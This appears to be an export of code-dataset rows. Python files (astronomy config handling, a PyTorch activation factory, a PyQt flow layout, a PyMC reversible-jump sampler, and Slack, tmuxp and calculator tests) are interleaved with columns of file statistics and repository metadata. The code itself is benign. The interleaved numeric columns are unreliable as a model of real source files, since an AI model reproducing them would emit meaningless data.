            mapBands.append(sedTerm['secondaryBand'])
            mapBands.append(sedTerm['tertiaryBand'])
    for mapTerm in mapTerms:
        if mapTerm not in self.sedBoundaryTermDict:
            raise RuntimeError("Term %s is used in sedTermDict but not in sedBoundaryTermDict" % (mapTerm))
    for mapBand in mapBands:
        if mapBand not in self.bands:
            raise RuntimeError("Band %s is used in sedTermDict but not in bands" % (mapBand))
    # and AB zeropoint
    # hPlanck/expPlanck: Planck constant split as 6.6e-27 (cgs) for log10 math.
    self.hPlanck = 6.6
    self.expPlanck = -27.0
    self.zptABNoThroughput = (-48.6 - 2.5 * self.expPlanck +
                              2.5 * np.log10(self.mirrorArea) -
                              2.5 * np.log10(self.hPlanck * self.cameraGain))
    self.fgcmLog.info("AB offset (w/o throughput) estimated as %.4f" % (self.zptABNoThroughput))
    # Keep the raw input config for saveConfigForNextCycle().
    self.configDictSaved = configDict
    ## FIXME: add pmb scaling?
def updateCycleNumber(self, newCycleNumber):
    """
    Update the cycle number for re-use of config.

    Regenerates the per-cycle output file base, log file, plot path, and
    (for internally-constructed loggers) the logger itself.

    Parameters
    ----------
    newCycleNumber: `int`
        New fit-cycle number.

    Raises
    ------
    RuntimeError
        If the new log file, or a non-empty plot directory, already exists
        and clobber is False.
    IOError
        If the plot path cannot be created.
    """
    self.cycleNumber = newCycleNumber
    self.outfileBaseWithCycle = '%s_cycle%02d' % (self.outfileBase, self.cycleNumber)
    logFile = '%s/%s.log' % (self.outputPath, self.outfileBaseWithCycle)
    if os.path.isfile(logFile) and not self.clobber:
        raise RuntimeError("Found logFile %s, but clobber == False." % (logFile))
    self.plotPath = None
    if self.doPlots:
        self.plotPath = '%s/%s_plots' % (self.outputPath, self.outfileBaseWithCycle)
        if os.path.isdir(self.plotPath) and not self.clobber:
            # Only refuse if the existing plot directory is non-empty.
            if len(os.listdir(self.plotPath)) > 0:
                raise RuntimeError("Found plots in %s, but clobber == False." % (self.plotPath))
    if not self.externalLogger:
        # Bug fix: the original referenced the undefined name `configDict`
        # here (it is only a parameter of __init__), raising NameError for
        # any internally-constructed logger.  self.printOnly holds the same
        # config value, installed by _setVarsFromDict().
        self.fgcmLog = FgcmLogger('%s/%s.log' % (self.outputPath,
                                                 self.outfileBaseWithCycle),
                                  self.logLevel, printLogger=self.printOnly)
    if (self.plotPath is not None and not os.path.isdir(self.plotPath)):
        try:
            os.makedirs(self.plotPath)
        except OSError as e:
            # Narrowed from a bare except so control-flow exceptions
            # (KeyboardInterrupt/SystemExit) are not swallowed.
            raise IOError("Could not create plot path: %s" % (self.plotPath)) from e
@staticmethod
def _readConfigDict(configFile):
    """
    Read a configuration dictionary from a yaml file.

    Parameters
    ----------
    configFile : `str`
        Path of the yaml configuration file.

    Returns
    -------
    configDict : `dict`
        Parsed configuration (safe-loaded).
    """
    with open(configFile) as fh:
        loaded = yaml.load(fh, Loader=yaml.SafeLoader)
    print("Configuration read from %s" % (configFile))
    return loaded
@classmethod
def configWithFits(cls, configDict, noOutput=False):
    """
    Initialize FgcmConfig object and read in fits files.

    Parameters
    ----------
    configDict: dict
        Dictionary with config variables; must contain 'exposureFile',
        'lutFile', and 'ccdOffsetFile' paths.
    noOutput: bool, default=False
        Do not create output directory.

    Raises
    ------
    IOError
        If the LUT file cannot be read.
    """
    # Imported lazily so fitsio is only required for the fits-based path.
    import fitsio

    expInfo = fitsio.read(configDict['exposureFile'], ext=1)
    try:
        lutIndex = fitsio.read(configDict['lutFile'], ext='INDEX')
        lutStd = fitsio.read(configDict['lutFile'], ext='STD')
    except Exception as e:
        # Narrowed from a bare except (which also caught KeyboardInterrupt);
        # chain the original cause for debugging.
        raise IOError("Could not read LUT info") from e
    ccdOffsets = fitsio.read(configDict['ccdOffsetFile'], ext=1)
    return cls(configDict, lutIndex, lutStd, expInfo, checkFiles=True, noOutput=noOutput, ccdOffsets=ccdOffsets)
def saveConfigForNextCycle(self, fileName, parFile, flagStarFile):
    """
    Save a yaml configuration file for the next fit cycle (using fits files).

    Parameters
    ----------
    fileName: string
        Config file filename
    parFile: string
        File with saved parameters from previous cycle
    flagStarFile: string
        File with flagged stars from previous cycle
    """
    configDict = self.configDictSaved.copy()
    # save the outputPath
    configDict['outputPath'] = self.outputPath
    # update the cycleNumber
    configDict['cycleNumber'] = self.cycleNumber + 1
    # default to NOT freeze atmosphere
    configDict['freezeStdAtmosphere'] = False
    # do we want to increase maxIter? Hmm.
    configDict['inParameterFile'] = parFile
    configDict['inFlagStarFile'] = flagStarFile
    # And update the photometric cuts, converted to plain floats for yaml.
    # Bug fix: the original assigned into the nested dicts in place, which
    # (a) raised KeyError when the saved user config omitted these optional
    # dicts, and (b) wrote through the shallow copy back into
    # self.configDictSaved.  Build fresh dicts instead.
    configDict['expGrayPhotometricCutDict'] = {
        b: float(self.expGrayPhotometricCutDict[b]) for b in self.bands
    }
    configDict['expGrayHighCutDict'] = {
        b: float(self.expGrayHighCutDict[b]) for b in self.bands
    }
    with open(fileName, 'w') as f:
        yaml.dump(configDict, stream=f)
def _setVarsFromDict(self, d):
    """
    Copy configuration values from a dict onto the instance.

    Raises AttributeError for any key that is not a declared class
    attribute (i.e. not a known config variable).
    """
    declared = type(self).__dict__
    for key, value in d.items():
        if key not in declared:
            raise AttributeError("Unknown config variable: %s" % (key))
        setattr(self, key, value)
def validate(self):
    """
    Run each declared ConfigField's validator against this instance.

    Class attributes without a .validate() method (plain attributes,
    methods) are skipped via the AttributeError catch.
    """
    for name, attr in type(self).__dict__.items():
        try:
            attr.validate(name)
        except AttributeError:
            # Not a ConfigField; nothing to validate.
            pass
def _setDefaultLengths(self):
    """
    Hook invoked by __init__ before validate(); currently a no-op.

    NOTE(review): presumably intended for setting default lengths of
    list-valued config fields — confirm against other config classes.
    """
    pass
def _convertDictToBandList(self, inputDict, dtype, default,
                           required=False, ndarray=False, dictName=''):
    """
    Convert an input dict into a list or ndarray in band order.

    Parameters
    ----------
    inputDict : `dict`
        Input dictionary, keyed by band name.
    dtype : `type`
        Type of array.
    default : value of dtype
        Value used for any band missing from inputDict.
    required : `bool`, optional
        All bands must be present in inputDict?
    ndarray : `bool`, optional
        Return ndarray (True) or list (False).
    dictName : `str`, optional
        Name of dict for error logging. Should be set if required is True.

    Returns
    -------
    bandOrderedList : `ndarray` or `list`
    """
    if required:
        for band in self.bands:
            if band not in inputDict:
                raise RuntimeError("All bands must be listed in %s" % (dictName))
    nBands = len(self.bands)
    if ndarray:
        out = np.full(nBands, default, dtype=dtype)
    else:
        out = [default] * nBands
    # Overwrite defaults with any values supplied for known bands.
    for index, band in enumerate(self.bands):
        if band in inputDict:
            out[index] = inputDict[band]
    return out
| 46.063882
| 139
| 0.618759
| 3,909
| 37,496
| 5.91251
| 0.168074
| 0.008437
| 0.027864
| 0.026869
| 0.261552
| 0.194358
| 0.17333
| 0.157061
| 0.135774
| 0.1009
| 0
| 0.011802
| 0.285897
| 37,496
| 813
| 140
| 46.120541
| 0.851359
| 0.114839
| 0
| 0.153707
| 0
| 0
| 0.111762
| 0.002851
| 0
| 0
| 0
| 0.00123
| 0
| 1
| 0.023508
| false
| 0.003617
| 0.012658
| 0.001808
| 0.287523
| 0.009042
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a33e4ece404ced51ee4f1506f207476b0d455c63
| 2,398
|
py
|
Python
|
pymic/layer/activation.py
|
vincentme/PyMIC
|
5cbbca7d0a19232be647086d4686ceea523f45ee
|
[
"Apache-2.0"
] | 147
|
2019-12-23T02:52:04.000Z
|
2022-03-06T16:30:43.000Z
|
pymic/layer/activation.py
|
vincentme/PyMIC
|
5cbbca7d0a19232be647086d4686ceea523f45ee
|
[
"Apache-2.0"
] | 4
|
2020-12-18T12:47:21.000Z
|
2021-05-21T02:18:01.000Z
|
pymic/layer/activation.py
|
vincentme/PyMIC
|
5cbbca7d0a19232be647086d4686ceea523f45ee
|
[
"Apache-2.0"
] | 32
|
2020-01-08T13:48:50.000Z
|
2022-03-12T06:31:13.000Z
|
# -*- coding: utf-8 -*-
from __future__ import print_function, division
import torch
import torch.nn as nn
def get_acti_func(acti_func, params):
    """
    Build an activation layer from its (case-insensitive) name.

    Options for each activation are read from `params` using keys prefixed
    by the activation name (e.g. 'leakyrelu_negative_slope'); missing keys
    fall back to the defaults below.

    Raises ValueError for an unknown activation name.
    """
    # Dispatch table: lowercase name -> builder reading its options from p.
    builders = {
        'relu': lambda p: nn.ReLU(p.get('relu_inplace', False)),
        'leakyrelu': lambda p: nn.LeakyReLU(p.get('leakyrelu_negative_slope', 1e-2),
                                            p.get('leakyrelu_inplace', False)),
        'prelu': lambda p: nn.PReLU(p.get('prelu_num_parameters', 1),
                                    p.get('prelu_init', 0.25)),
        'rrelu': lambda p: nn.RReLU(p.get('rrelu_lower', 1.0 / 8),
                                    p.get('rrelu_upper', 1.0 / 3),
                                    p.get('rrelu_inplace', False)),
        'elu': lambda p: nn.ELU(p.get('elu_alpha', 1.0),
                                p.get('elu_inplace', False)),
        'celu': lambda p: nn.CELU(p.get('celu_alpha', 1.0),
                                  p.get('celu_inplace', False)),
        'selu': lambda p: nn.SELU(p.get('selu_inplace', False)),
        'glu': lambda p: nn.GLU(p.get('glu_dim', -1)),
        'sigmoid': lambda p: nn.Sigmoid(),
        'logsigmoid': lambda p: nn.LogSigmoid(),
        'tanh': lambda p: nn.Tanh(),
        'hardtanh': lambda p: nn.Hardtanh(p.get('hardtanh_min_val', -1.0),
                                          p.get('hardtanh_max_val', 1.0),
                                          p.get('hardtanh_inplace', False)),
        'softplus': lambda p: nn.Softplus(p.get('softplus_beta', 1.0),
                                          p.get('softplus_threshold', 20)),
        'softshrink': lambda p: nn.Softshrink(p.get('softshrink_lambda', 0.5)),
        'softsign': lambda p: nn.Softsign(),
    }
    name = acti_func.lower()
    if name not in builders:
        raise ValueError("Not implemented: {0:}".format(name))
    return builders[name](params)
| 31.552632
| 67
| 0.607173
| 306
| 2,398
| 4.568627
| 0.222222
| 0.114449
| 0.120172
| 0.100143
| 0.080114
| 0.032904
| 0
| 0
| 0
| 0
| 0
| 0.016111
| 0.249374
| 2,398
| 76
| 67
| 31.552632
| 0.760556
| 0.008757
| 0
| 0
| 0
| 0
| 0.1633
| 0.010101
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017544
| false
| 0
| 0.052632
| 0
| 0.333333
| 0.017544
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a33eb973d0edc831eea7bb11066042e56e9c2e88
| 3,359
|
py
|
Python
|
ui/flowlayout.py
|
amadotejada/self-portal
|
c508fb120548f3eb65e872d08a823d3942fc650d
|
[
"Apache-2.0"
] | 9
|
2022-03-15T02:02:30.000Z
|
2022-03-18T16:16:59.000Z
|
ui/flowlayout.py
|
amadotejada/self-portal
|
c508fb120548f3eb65e872d08a823d3942fc650d
|
[
"Apache-2.0"
] | null | null | null |
ui/flowlayout.py
|
amadotejada/self-portal
|
c508fb120548f3eb65e872d08a823d3942fc650d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Amado Tejada
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from PyQt5.QtCore import QPoint, QRect, QSize, Qt
from PyQt5.QtWidgets import QLayout, QSizePolicy
class FlowLayout(QLayout):
    """
    A QLayout that places child items left-to-right and wraps to a new
    row when the next item would cross the layout rectangle's right edge.
    """

    def __init__(self, parent=None, margin=0, spacing=-1):
        super(FlowLayout, self).__init__(parent)
        if parent is not None:
            self.setContentsMargins(margin, margin, margin, margin)
        self.setSpacing(spacing)
        self.itemList = []

    def __del__(self):
        # Drain all items on destruction.
        while self.takeAt(0) is not None:
            pass

    def addItem(self, item):
        self.itemList.append(item)

    def count(self):
        return len(self.itemList)

    def itemAt(self, index):
        # Out-of-range lookups return None rather than raising.
        if index < 0 or index >= len(self.itemList):
            return None
        return self.itemList[index]

    def takeAt(self, index):
        if index < 0 or index >= len(self.itemList):
            return None
        return self.itemList.pop(index)

    def expandingDirections(self):
        # This layout does not claim extra space in either direction.
        return Qt.Orientations(Qt.Orientation(0))

    def hasHeightForWidth(self):
        return True

    def heightForWidth(self, width):
        # Dry-run the layout to measure the wrapped height for this width.
        return self.doLayout(QRect(0, 0, width, 0), True)

    def setGeometry(self, rect):
        super(FlowLayout, self).setGeometry(rect)
        self.doLayout(rect, False)

    def sizeHint(self):
        return self.minimumSize()

    def minimumSize(self):
        combined = QSize()
        for item in self.itemList:
            combined = combined.expandedTo(item.minimumSize())
        margin, _, _, _ = self.getContentsMargins()
        return combined + QSize(2 * margin, 2 * margin)

    def doLayout(self, rect, testOnly):
        """Place items into rect (unless testOnly); return the total height."""
        cursorX = rect.x()
        cursorY = rect.y()
        rowHeight = 0
        for item in self.itemList:
            widgetStyle = item.widget().style()
            spaceX = self.spacing() + widgetStyle.layoutSpacing(
                QSizePolicy.PushButton, QSizePolicy.PushButton, Qt.Horizontal)
            spaceY = self.spacing() + widgetStyle.layoutSpacing(
                QSizePolicy.PushButton, QSizePolicy.PushButton, Qt.Vertical)
            hint = item.sizeHint()
            nextX = cursorX + hint.width() + spaceX
            if nextX - spaceX > rect.right() and rowHeight > 0:
                # Wrap to the start of the next row.
                cursorX = rect.x()
                cursorY = cursorY + rowHeight + spaceY
                nextX = cursorX + hint.width() + spaceX
                rowHeight = 0
            if not testOnly:
                item.setGeometry(QRect(QPoint(cursorX, cursorY), hint))
            cursorX = nextX
            rowHeight = max(rowHeight, hint.height())
        return cursorY + rowHeight - rect.y()
| 31.688679
| 112
| 0.575171
| 370
| 3,359
| 5.181081
| 0.362162
| 0.056338
| 0.023474
| 0.016693
| 0.18362
| 0.161711
| 0.131455
| 0.131455
| 0.131455
| 0.131455
| 0
| 0.011101
| 0.329562
| 3,359
| 105
| 113
| 31.990476
| 0.840142
| 0.164037
| 0
| 0.215385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.030769
| 0.061538
| 0.415385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a340df3cf71eb1be1675fbe29cece65cbcc98d43
| 3,183
|
py
|
Python
|
methods/smartdumpRJ.py
|
wdempsey/sense2stop-lvm
|
ea44d5f9199382d30e4c5a5ff4bd524313ceb5b2
|
[
"CECILL-B"
] | 1
|
2020-04-18T11:16:02.000Z
|
2020-04-18T11:16:02.000Z
|
methods/smartdumpRJ.py
|
wdempsey/sense2stop-lvm
|
ea44d5f9199382d30e4c5a5ff4bd524313ceb5b2
|
[
"CECILL-B"
] | 6
|
2020-04-13T18:38:04.000Z
|
2022-03-12T00:55:56.000Z
|
methods/smartdumpRJ.py
|
wdempsey/sense2stop-lvm
|
ea44d5f9199382d30e4c5a5ff4bd524313ceb5b2
|
[
"CECILL-B"
] | 1
|
2020-07-02T04:47:00.000Z
|
2020-07-02T04:47:00.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Tue May 26 14:29:26 2020
@author: Walter Dempsey & Jamie Yap
"""
#%%
###############################################################################
# Build a RJMCMC class
###############################################################################
from copy import deepcopy

import numpy as np
from numpy import ma, random, where
from numpy.random import random
from pymc import Stochastic, Deterministic, Node, StepMethod
class smartdumbRJ(StepMethod):
    """
    S = smartdumbRJ(self, stochs, indicator, p, rp, g, q, rq, inv_q, Jacobian, **kwargs)

    smartdumbRJ can control single indicatored-array-valued stochs. The
    indicator indicates which stochs (events) are currently 'in the model;' if
    stoch.value.indicator[index] = True, that index is currently being excluded.

    indicatored-array-valued stochs and their children should understand how to
    cope with indicatored arrays when evaluating their logpabilities.

    The prior for the indicatored-array-valued stoch may depend explicitly on the
    indicator.

    The dtrm arguments are, in notation similar to that of Waagepetersen et al.:

    def p(indicator):
        Returns the probability of jumping to

    def smartbirth(indicator):
        Draws a value for the auxiliary RV's u given indicator.value (proposed),
        indicator.last_value (current), and the value of the stochs.

    def smartdeath(indicator):
    """

    def __init__(self, stochs, indicator, p, rp, g, q, rq, inv_q, Jacobian):
        StepMethod.__init__(self, nodes=stochs)
        # Reversible-jump callables (Waagepetersen-style notation).
        self.g = g
        self.q = q
        self.rq = rq
        self.p = p
        self.rp = rp
        self.inv_q = inv_q
        self.Jacobian = Jacobian
        # Name -> stoch map, passed as keyword arguments to g and Jacobian.
        self.stoch_dict = {}
        for stoch in stochs:
            self.stoch_dict[stoch.__name__] = stoch
        self.indicator = indicator

    def propose(self):
        """
        Sample a new indicator and value for the stoch.
        """
        self.rp(self.indicator)
        self._u = self.rq(self.indicator)
        self.g(self.indicator, self._u, **self.stoch_dict)

    def step(self):
        """Perform one reversible-jump Metropolis-Hastings step."""
        # logp and loglike for the stochs' current values:
        logp = sum([stoch.logp for stoch in self.stochs]) + self.indicator.logp
        loglike = self.loglike
        # Sample a candidate value for the value and indicator of the stoch.
        self.propose()
        # logp for the stochs' proposed values:
        logp_p = sum([stoch.logp for stoch in self.stochs]) + self.indicator.logp
        # Skip the rest if a bad value is proposed.
        # Bug fix: `Inf` was an undefined name (NameError at runtime);
        # use np.inf.  Also `stoch.revert` was a bare attribute access
        # that never called the method — proposals were silently kept.
        if logp_p == -np.inf:
            for stoch in self.stochs:
                stoch.revert()
            return
        loglike_p = self.loglike
        # Log acceptance ratio, including proposal and Jacobian corrections:
        test_val = logp_p + loglike_p - logp - loglike
        test_val += self.inv_q(self.indicator)
        test_val += self.q(self.indicator, self._u)
        if self.Jacobian is not None:
            test_val += self.Jacobian(self.indicator, self._u, **self.stoch_dict)
        # Bug fix: `log` was an undefined name; use np.log.  Reject (and
        # actually revert, with the call parentheses the original omitted)
        # when the MH test fails.
        if np.log(random()) > test_val:
            for stoch in self.stochs:
                stoch.revert()

    def tune(self):
        # No adaptive tuning for this step method.
        pass
| 31.514851
| 88
| 0.602576
| 405
| 3,183
| 4.646914
| 0.330864
| 0.062168
| 0.026567
| 0.038257
| 0.201913
| 0.190223
| 0.158342
| 0.092455
| 0.092455
| 0.092455
| 0
| 0.005556
| 0.264844
| 3,183
| 100
| 89
| 31.83
| 0.798718
| 0.401194
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0.02439
| 0.097561
| 0
| 0.243902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a34205264c406b528a6fcfa5ac69debf00a2b02c
| 2,021
|
py
|
Python
|
tests/test_slack_user.py
|
tomcooperca/mlb-slack-tracker
|
bbfd8ed6f0c345d5286813a6cd4b04e0557a762a
|
[
"MIT"
] | null | null | null |
tests/test_slack_user.py
|
tomcooperca/mlb-slack-tracker
|
bbfd8ed6f0c345d5286813a6cd4b04e0557a762a
|
[
"MIT"
] | 7
|
2018-09-08T20:07:43.000Z
|
2021-12-13T19:54:53.000Z
|
tests/test_slack_user.py
|
tomcooperca/mlb-slack-tracker
|
bbfd8ed6f0c345d5286813a6cd4b04e0557a762a
|
[
"MIT"
] | null | null | null |
from unittest.mock import MagicMock
from slack.user import User
from baseball.team import Team
# Shared fixtures for the status-formatting tests below: a user with no
# team, and a fully-populated (fabricated) team record.
reusableUser = User(token='blah', id='UB00123', team=None)
testTeam = Team(abbreviation='CN', location='City Name',
                full_name='City Name Players', record='0W-162L', division='CL Beast',
                wins=0, losses=162, standing=5, todays_game_text='CN@BOB',
                todays_game_score='1-0')
def test_init():
    """A freshly constructed User keeps the id it was given."""
    user = User(token='gooblygook', id='ABC123', team=None)
    assert user.id == 'ABC123'
def test_status_calls_updater():
    """status() delegates to the status updater's display_status."""
    mock_display = MagicMock(return_value="Test status")
    reusableUser.su.display_status = mock_display
    reusableUser.status()
    mock_display.assert_called_with()
def test_emoji_calls_updater():
    """emoji() delegates to the status updater's display_status_emot."""
    mock_emot = MagicMock(return_value=":cat:")
    reusableUser.su.display_status_emot = mock_emot
    reusableUser.emoji()
    mock_emot.assert_called_with()
def test_simple_team_and_record_status():
    """simple_team_and_record() posts '<abbr> | <record>'."""
    user = User(token='blah', id='UB00123', team=testTeam)
    user.su.update_status = MagicMock()
    user.simple_team_and_record()
    user.su.update_status.assert_called_once_with(status='CN | 0W-162L')
def test_todays_game_and_standings_status():
    """todays_game_and_standings() posts '<game> | <record> | #<standing> in <division>'."""
    user = User(token='blah', id='UB00123', team=testTeam)
    user.su.update_status = MagicMock()
    user.todays_game_and_standings()
    user.su.update_status.assert_called_once_with(
        status='CN@BOB | 0W-162L | #5 in CL Beast')
# NOTE(review): this is a byte-for-byte duplicate of the
# test_todays_game_and_standings_status defined immediately above; being
# defined later, it shadows the first so only one copy ever runs.
# Consider deleting this definition.
def test_todays_game_and_standings_status():
    expected = 'CN@BOB | 0W-162L | #5 in CL Beast'
    u = User(token='blah', id='UB00123', team=testTeam)
    u.su.update_status = MagicMock()
    u.todays_game_and_standings()
    u.su.update_status.assert_called_once_with(status=expected)
def test_todays_game_score_and_standings_status():
    """todays_game_score_and_standings() includes the final score in the status."""
    user = User(token='blah', id='UB00123', team=testTeam)
    user.su.update_status = MagicMock()
    user.todays_game_score_and_standings()
    user.su.update_status.assert_called_once_with(
        status='CN@BOB (Final: 1-0) | 0W-162L | #5 in CL Beast')
| 34.844828
| 74
| 0.730332
| 295
| 2,021
| 4.738983
| 0.230508
| 0.057225
| 0.051502
| 0.085837
| 0.635908
| 0.570815
| 0.474249
| 0.474249
| 0.474249
| 0.474249
| 0
| 0.036228
| 0.139535
| 2,021
| 57
| 75
| 35.45614
| 0.767683
| 0
| 0
| 0.418605
| 0
| 0
| 0.133102
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 1
| 0.162791
| false
| 0
| 0.069767
| 0
| 0.232558
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a342151afcda4ba72f2d257247a2de01de22ba98
| 1,934
|
py
|
Python
|
tmuxp/testsuite/test_workspacefreezer.py
|
wrongwaycn/tmuxp
|
367cca3eb1b3162bb7e4801fe752b520f1f8eefa
|
[
"BSD-3-Clause"
] | 2
|
2018-02-05T01:27:07.000Z
|
2018-06-10T02:02:25.000Z
|
tmuxp/testsuite/test_workspacefreezer.py
|
wrongwaycn/tmuxp
|
367cca3eb1b3162bb7e4801fe752b520f1f8eefa
|
[
"BSD-3-Clause"
] | null | null | null |
tmuxp/testsuite/test_workspacefreezer.py
|
wrongwaycn/tmuxp
|
367cca3eb1b3162bb7e4801fe752b520f1f8eefa
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, with_statement
import os
import sys
import logging
import time
import kaptan
from .. import Window, config, exc
from ..workspacebuilder import WorkspaceBuilder, freeze
from .helpers import TmuxTestCase
logger = logging.getLogger(__name__)
current_dir = os.path.abspath(os.path.dirname(__file__))
example_dir = os.path.abspath(os.path.join(current_dir, '..', '..'))
class FreezeTest(TmuxTestCase):
    """Build a tmux session from YAML, freeze it, and re-export the config."""

    # Sample session: an editor window with two panes, a log-tailing
    # window, and a plain htop window.
    # NOTE(review): the indentation of this YAML literal was reconstructed
    # from a whitespace-mangled copy — verify against upstream before
    # relying on its exact bytes.
    yaml_config = """
    session_name: sampleconfig
    start_directory: '~'
    windows:
    - layout: main-vertical
      panes:
      - shell_command:
        - vim
        start_directory: '~'
      - shell_command:
        - echo "hey"
        - cd ../
      window_name: editor
    - panes:
      - shell_command:
        - tail -F /var/log/syslog
        start_directory: /var/log
      window_name: logging
    - window_name: test
      panes:
      - shell_command:
        - htop
    """

    def test_focus(self):
        # assure the built yaml config has focus
        # TODO: not implemented yet.
        pass

    def test_freeze_config(self):
        """Round-trip: build -> freeze -> validate -> export JSON/YAML."""
        sconfig = kaptan.Kaptan(handler='yaml')
        sconfig = sconfig.import_config(self.yaml_config).get()
        builder = WorkspaceBuilder(sconf=sconfig)
        builder.build(session=self.session)
        assert(self.session == builder.session)
        import time  # NOTE(review): redundant — already imported at module level.
        time.sleep(1)  # give tmux a moment to settle before freezing
        session = self.session
        sconf = freeze(session)
        # The frozen config must pass schema validation and survive inlining.
        config.validate_schema(sconf)
        sconf = config.inline(sconf)
        # Re-import into kaptan and export both formats; results are unused
        # beyond proving the export calls do not raise.
        kaptanconf = kaptan.Kaptan()
        kaptanconf = kaptanconf.import_config(sconf)
        json = kaptanconf.export(
            'json',
            indent=2
        )
        yaml = kaptanconf.export(
            'yaml',
            indent=2,
            default_flow_style=False,
            safe=True
        )
        #logger.error(json)
        #logger.error(yaml)
| 23.585366
| 80
| 0.609617
| 205
| 1,934
| 5.560976
| 0.453659
| 0.021053
| 0.044737
| 0.02807
| 0.038596
| 0.038596
| 0
| 0
| 0
| 0
| 0
| 0.002909
| 0.289038
| 1,934
| 81
| 81
| 23.876543
| 0.826182
| 0.049638
| 0
| 0.16129
| 0
| 0
| 0.267321
| 0
| 0
| 0
| 0
| 0
| 0.016129
| 1
| 0.032258
| false
| 0.016129
| 0.193548
| 0
| 0.258065
| 0.016129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a34438fcd2d05af774f8b7d208037ebd093f49f3
| 1,488
|
py
|
Python
|
test.py
|
KyleJeong/ast_calculator
|
cf65ad76739839ac4b3df36b82862612d6bd4492
|
[
"MIT"
] | 6
|
2016-07-20T07:37:07.000Z
|
2022-01-14T06:35:26.000Z
|
test.py
|
KyleJeong/ast_calculator
|
cf65ad76739839ac4b3df36b82862612d6bd4492
|
[
"MIT"
] | 1
|
2020-03-29T05:13:58.000Z
|
2020-03-29T05:13:58.000Z
|
test.py
|
KyleJeong/ast_calculator
|
cf65ad76739839ac4b3df36b82862612d6bd4492
|
[
"MIT"
] | 1
|
2020-03-29T04:29:36.000Z
|
2020-03-29T04:29:36.000Z
|
"""
Test cases for AST calculator
"""
from unittest import TestCase
from calc import evaluate
class TestCaclEvaluate(TestCase):
    """
    Test cases for AST calculator - evaluation
    """
    # NOTE(review): the class name looks like a typo for "TestCalcEvaluate";
    # kept as-is so any external references keep working.

    def test_simple_expression(self):
        """
        Test expression without functions or constants
        """
        data = [
            ("84-9*3", 57),
            ("8**4", 4096),
            ("3*(2*5)**3/(123-32+9)", 30),
        ]
        for expression, expected in data:
            result = evaluate(expression)
            msg = "{} evaluated to: {}. Expected {}".format(
                expression, result, expected)
            # assertEqual: the assertEquals spelling is a deprecated alias.
            self.assertEqual(result, expected, msg)

    def test_complex_expression(self):
        """
        Test expression with functions or constants
        """
        data = [
            ("2*log(exp(2))", 4),
            ("cos(2*pi)", 1),
            ("log(8,2)", 3),
        ]
        for expression, expected in data:
            result = evaluate(expression)
            msg = "{} evaluated to: {}. Expected {}".format(
                expression, result, expected)
            self.assertEqual(result, expected, msg)

    def test_invalid_expression(self):
        """
        Make sure code will behave correctly for invalid input
        """
        data = [
            "1/0",
            "import os",
        ]
        for expression in data:
            # NOTE(review): StandardError exists only on Python 2, so this
            # suite targets Python 2.x; on Python 3 this would need to catch
            # a different base class (e.g. ArithmeticError/ValueError).
            with self.assertRaises(StandardError):
                evaluate(expression)
| 23.619048
| 62
| 0.511425
| 145
| 1,488
| 5.206897
| 0.427586
| 0.074172
| 0.031788
| 0.039735
| 0.445033
| 0.378808
| 0.378808
| 0.378808
| 0.378808
| 0.378808
| 0
| 0.036132
| 0.367608
| 1,488
| 62
| 63
| 24
| 0.766206
| 0.146505
| 0
| 0.393939
| 0
| 0
| 0.116299
| 0.017827
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.090909
| false
| 0
| 0.090909
| 0
| 0.212121
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
